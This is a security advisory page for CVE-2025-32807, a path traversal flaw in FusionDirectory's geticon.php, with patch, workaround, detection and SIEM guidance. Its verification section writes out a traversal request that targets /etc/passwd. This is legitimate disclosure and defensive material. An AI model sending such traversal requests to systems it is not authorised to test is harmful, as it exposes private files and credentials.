CVE-2025-32807
📋 TL;DR
A path traversal vulnerability in FusionDirectory allows remote attackers to read arbitrary files ending with .png, .svg, or .xpm extensions via the icon parameter in geticon.php requests. This affects all FusionDirectory installations before version 1.5 that are exposed to untrusted networks.
💻 Affected Systems
- FusionDirectory
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could read sensitive system files containing passwords, configuration data, or other secrets, potentially leading to further system compromise.
Likely Case
Information disclosure of internal files, potentially exposing configuration details or limited sensitive data.
If Mitigated
Limited impact with proper network segmentation and file permission controls in place.
🎯 Exploit Status
Simple HTTP GET request manipulation required; no authentication needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.5
Vendor Advisory: https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/Changelog.md?plain=1#L112
Restart Required: No
Instructions:
1. Backup current installation. 2. Update to FusionDirectory 1.5 or later. 3. Verify the patch by checking the geticon.php file for proper path validation.
🔧 Temporary Workarounds
Web Server Access Restriction
linuxRestrict access to geticon.php via web server configuration
# For Apache: add to .htaccess or virtual host config
<Files "geticon.php">
Require all denied
</Files>
# For Nginx: add to server block
location = /geticon.php {
deny all;
}
File Permission Restriction
linuxSet strict permissions on sensitive directories
chmod 750 /var/www/html/fusiondirectory
chown root:www-data /var/www/html/fusiondirectory
🧯 If You Can't Patch
- Implement network segmentation to restrict access to FusionDirectory to trusted internal networks only.
- Deploy a web application firewall (WAF) with path traversal protection rules.
🔍 How to Verify
Check if Vulnerable:
Test by sending a GET request to /geticon.php?icon=../../../etc/passwd.png and checking if file contents are returned.Check Version:
grep 'FusionDirectory' /var/www/html/fusiondirectory/include/variables.inc.php | grep VERSIONVerify Fix Applied:
After patching, repeat the test request; it should return an error or default icon instead of file contents.📡 Detection & Monitoring
Log Indicators:
- HTTP GET requests to geticon.php with ../ sequences in parameters
- Unusual file access patterns in web server logs
Network Indicators:
- HTTP requests with path traversal sequences (.png, .svg, .xpm extensions)
SIEM Query:
source="web_server_logs" AND uri="/geticon.php" AND (param="icon" AND value="*../*")🔗 References
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/Changelog.md?plain=1#L112
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/blob/e9304844fb5c8ce4a9af9e26858af5e22e15b9bd/include/class_IconTheme.inc#L233-237
- https://gitlab.fusiondirectory.org/fusiondirectory/fd/-/commit/9edefd0b367450d665a141c5e94db8a06d208556
